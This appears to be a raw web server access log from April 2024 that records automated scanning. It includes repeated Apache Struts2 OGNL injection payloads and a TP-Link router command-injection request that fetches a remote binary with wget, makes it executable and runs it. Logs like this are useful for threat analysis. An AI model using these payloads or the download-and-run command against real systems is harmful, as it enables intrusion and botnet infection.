[25/Apr/2024 06:16:56] "POST / HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:17:04] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:17:04] "POST /index.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:17:11] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:17:11] "POST /login.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:17:18] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:17:18] "POST /index.do HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:17:25] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:17:25] "POST /index.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:17:32] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:17:32] "POST /login.do HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:17:38] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:17:38] "POST /login.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:17:45] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:17:45] "POST /main.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:17:52] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:17:52] "POST /default.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:17:59] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:17:59] "POST /register.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:18:16] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:18:16] "POST /login/login.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:18:24] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:18:24] "POST /login/indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:18:31] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:18:31] "POST /indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:18:39] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:18:39] "GET //%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:18:46] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:18:46] "GET /index.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:18:53] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:18:53] "GET /login.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:19:01] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:19:01] "GET /index.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:19:08] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:19:08] "GET /index.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:19:15] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:19:15] "GET /login.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:19:21] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:19:21] "GET /login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 205.210.31.53 - - [25/Apr/2024 06:19:22] "GET / HTTP/1.0" 200 - 211.233.24.7 - - [25/Apr/2024 06:19:28] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:19:28] "GET /main.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:19:34] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:19:34] "GET /default.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:19:40] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:19:40] "GET /register.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:19:45] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:19:45] "GET /login/login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:19:51] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:19:51] "GET /login/indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:19:57] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:19:57] "GET /indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:20:02] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:02] "POST / HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:08] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:08] "POST /index.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:13] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:13] "POST /login.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:18] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:18] "POST /index.do HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:22] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:22] "POST /index.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:26] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:26] "POST /login.do HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:30] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:30] "POST /login.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:34] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:34] "POST /main.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:37] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:37] "POST /default.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:40] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:40] "POST /register.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:43] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:43] "POST /login/login.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:46] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:46] "POST /login/indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:50] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:20:50] "POST /indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:20:53] "GET /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 200 - 211.233.24.7 - - [25/Apr/2024 06:20:56] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:20:56] "GET /index.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:20:58] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:20:58] "GET /login.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:21:01] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:21:01] "GET /index.do?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:21:04] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:21:04] "GET /index.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:21:07] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:21:07] "GET /login.do?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:21:10] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:21:10] "GET /login.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:21:12] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:21:12] "GET /main.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:21:15] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:21:15] "GET /default.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:21:17] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:21:17] "GET /register.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:21:19] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:21:19] "GET /login/login.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:21:22] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:21:22] "GET /login/indexAction.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:21:24] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:21:24] "GET /indexAction.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 198.199.98.60 - - [25/Apr/2024 06:54:36] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 198.199.98.60 - - [25/Apr/2024 06:54:36] "MGLNDD_203.219.129.101_80" 400 - 45.142.182.92 - - [25/Apr/2024 07:22:08] code 404, message File not found 45.142.182.92 - - [25/Apr/2024 07:22:08] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 84.54.51.13 - - [25/Apr/2024 07:53:24] code 501, message Unsupported method ('POST') 84.54.51.13 - - [25/Apr/2024 07:53:24] "POST /login HTTP/1.1" 501 - 78.153.140.177 - - [25/Apr/2024 08:19:35] code 404, message File not found 78.153.140.177 - - [25/Apr/2024 08:19:35] "GET /.env HTTP/1.1" 404 - 78.153.140.177 - - [25/Apr/2024 08:19:35] code 400, message Bad request version ('Tþ9Æ}S\\x99d\\x9f(\\x03\\x19¦ÈµÊ\\x14bb¢Ì[Ìп¿M62J*þ\\x00b\\x13\\x02\\x13\\x03\\x13\\x01À,À0À+À/̨̩\\x00£\\x00\\x9f\\x00¢\\x00\\x9e̪À¯À\\xadÀ$À(À') 78.153.140.177 - - [25/Apr/2024 08:19:35] "\x16\x03\x01\x01H\x01\x00\x01D\x03\x03ß\x11\x06\x0el\x9bëki\x06K\x95\x0fs\x9bð÷¥´\x0búåÌ0»\x9fÇ8O>9\x9e Tþ9Æ}S\x99d\x9f(\x03\x19¦ÈµÊ\x14bb¢Ì[Ìп¿M62J*þ\x00b\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩\x00£\x00\x9f\x00¢\x00\x9e̪À¯À­À$À(À" 400 - 109.205.213.198 - - [25/Apr/2024 08:33:02] "GET / HTTP/1.1" 200 - 159.203.108.140 - - [25/Apr/2024 08:45:24] "GET / HTTP/1.0" 200 - 159.203.108.140 - - [25/Apr/2024 09:03:17] "GET / HTTP/1.1" 200 - 159.203.108.140 - - [25/Apr/2024 09:03:18] code 404, message File not found 159.203.108.140 - - [25/Apr/2024 09:03:18] "GET /favicon.ico HTTP/1.1" 404 - 115.231.78.9 - - [25/Apr/2024 09:07:06] "GET / HTTP/1.1" 200 - 115.231.78.9 - - [25/Apr/2024 09:07:07] "GET / HTTP/1.1" 200 - 115.231.78.9 - - [25/Apr/2024 09:07:07] code 404, message File not found 115.231.78.9 - - [25/Apr/2024 09:07:07] "GET /favicon.ico HTTP/1.1" 404 - 115.231.78.9 - - [25/Apr/2024 09:07:08] code 404, message File not found 115.231.78.9 - - [25/Apr/2024 09:07:08] "GET /robots.txt HTTP/1.1" 404 - 185.224.128.43 - - [25/Apr/2024 11:00:19] "GET / HTTP/1.1" 200 - 162.216.149.47 - - [25/Apr/2024 11:20:52] "GET / HTTP/1.1" 200 - 43.163.232.152 - - [25/Apr/2024 11:25:51] code 400, message Bad request version ('À#À¬À®À+À') 43.163.232.152 - - [25/Apr/2024 11:25:51] "\x16\x03\x03\x01¨\x01\x00\x01¤\x03\x03KO4N(y\x1cÆ~§\x85\\`­*þW`°,1\x1c\x82\x0fÒ¬¿\x1eÓbÅ^ Q\x0c\x9bÖ\x1aMüIAµ@n\x92`Ú\x9bPp(\x16rÔ·æ\x88¦K(\x8d`²\x07\x00\x8a\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:51] code 400, message Bad request syntax ('\\x16\\x03\\x03\\x01¨\\x01\\x00\\x01¤\\x03\\x03\\x14öÑ') 43.163.232.152 - - [25/Apr/2024 11:25:51] "\x16\x03\x03\x01¨\x01\x00\x01¤\x03\x03\x14öÑ" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:52] code 400, message Bad request version ('z\\x00FÀ\\x12À\\x07Ì\\x14\\x13\\x01\\x13\\x02Ì©ÀsÀrÀ,À¯À\\xadÀ$À') 43.163.232.152 - - [25/Apr/2024 11:25:52] "\x16\x03\x03\x01Y\x01\x00\x01U\x03\x03ýÛÛù?\x11&,XNÅ\x06@è0¬ÆÝøáÀº\x8b\x07PLL¤\x815\x85b \x12³ù\x90¾\x9c\x11ûZ\x0e"\x8eÁBB³\x1aöÞ0~\x85G\x14nÆg5ݧ z\x00FÀ\x12À\x07Ì\x14\x13\x01\x13\x02Ì©ÀsÀrÀ,À¯À­À$À" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:53] code 400, message Bad request version ("\\x12s³ûDKpÔ\\x90\\x8b\\x08\\x91ÆÜþz3ÔÊë³ñ{QÕ®ZÃ$Å`õ\\x00DÀ\\x13À'À/À\\x14À(À0À`ÀaÀvÀw̨\\x13\\x05\\x13\\x04\\x13\\x03Ì\\x13À\\x11\\x00") 43.163.232.152 - - [25/Apr/2024 11:25:53] "\x16\x03\x03\x01K\x01\x00\x01G\x03\x03§\x12W\x88[Q<¢Ü?tG¼\x11\x0c´\x8b\x0bC\x88ò5ýjÃN\x93\x0e\x9b\x01"Á \x12s³ûDKpÔ\x90\x8b\x08\x91ÆÜþz3ÔÊë³ñ{QÕ®ZÃ$Å`õ\x00DÀ\x13À'À/À\x14À(À0À`ÀaÀvÀw̨\x13\x05\x13\x04\x13\x03Ì\x13À\x11\x00" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:53] code 400, message Bad request version ('o9¶"â=rñQ\\x01') 43.163.232.152 - - [25/Apr/2024 11:25:53] "\x16\x03\x03\x01\x9c\x01\x00\x01\x98\x03\x03\x8f§vÌ\x9f\x1füÍÌ\x08H¢f¼³úÒ\x97uÝ\x04eÐh_=è&\x80Ðû) o9¶"â=rñQ\x01" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:54] code 400, message Bad request version ('À#À¬À®À+À') 43.163.232.152 - - [25/Apr/2024 11:25:54] "\x16\x03\x02\x01\x9d\x01\x00\x01\x99\x03\x02ñ\x89^¼\x97°\x8dÑfón$äN ÿ|7E.\x9egÍ{"ðê\x02ÏîGÇ øæÄd\x91¾?\x87 QMl\x83\x07¸\x87Cæ)öú \x9cbwJ\x04;\x157.X\x00\x8a\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:54] code 400, message Bad request version ('À#À¬À®À+À') 43.163.232.152 - - [25/Apr/2024 11:25:54] "\x16\x03\x01\x01ª\x01\x00\x01¦\x03\x03+<înÀA@-.t[#Úæn\x1eÂË&/¦Ò\x1ea¢\x12º\x9a¾kñ\x89 ÅÞSâÔw\x10¤ò-\x0fYPÍ\x07Â!Ê\x14B"q\x15käÞ\x94¿SáÉ{\x00\x8a\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:55] code 400, message Bad request version ('À\\x9c\\x00<\\x00/\\x00') 43.163.232.152 - - [25/Apr/2024 11:25:55] "\x16\x03\x01\x01ª\x01\x00\x01¦\x03\x03T\x0e"îÉ[©^\x03ÞÙ\x9c\x0cj4lë\x98-fÑøt{\x0chb\x9dô÷Ël æ\x024dMêº\x91HØ\x9c¦\x95ÙÉ.;}\x8f\x88\x81üµßÚú\x83\x7f½Òv*\x00\x8a\x00\x05\x00\x04\x00\x07\x00À\x00\x84\x00º\x00A\x00\x9dÀ¡À\x9d\x00=\x005\x00\x9cÀ À\x9c\x00<\x00/\x00" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:56] code 400, message Bad request version ('Ä%\\x8d%¶ì!»ã¥å\\x81V\\x115\\x91c\\x99') 43.163.232.152 - - [25/Apr/2024 11:25:56] "\x16\x03\x01\x01 \x01\x00\x01\x9c\x03\x03¿Ë\x94\x88FsGÈâ\x85Ä%\x8d%¶ì!»ã¥å\x81V\x115\x91c\x99" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:56] code 400, message Bad request version ('3äd|\\x8bÁã%A®¾\\x00\\x15"EE)\\x8eù\\x02\\xad\\x00\\x8cÚÚÀ\\x12À\\x13À\\x07À\\'Ì\\x14À/\\x13\\x01À\\x14\\x13\\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ\\xad̨À$\\x13\\x05À') 43.163.232.152 - - [25/Apr/2024 11:25:56] "\x16\x03\x01\x01·\x01\x00\x01³\x03\x03\x06À^ZÐ=æ\x82\x00ÞI\x96X\x89ø\x8eâñDíÅ\x01h,ÇÀ\x8fa\x88\x01² 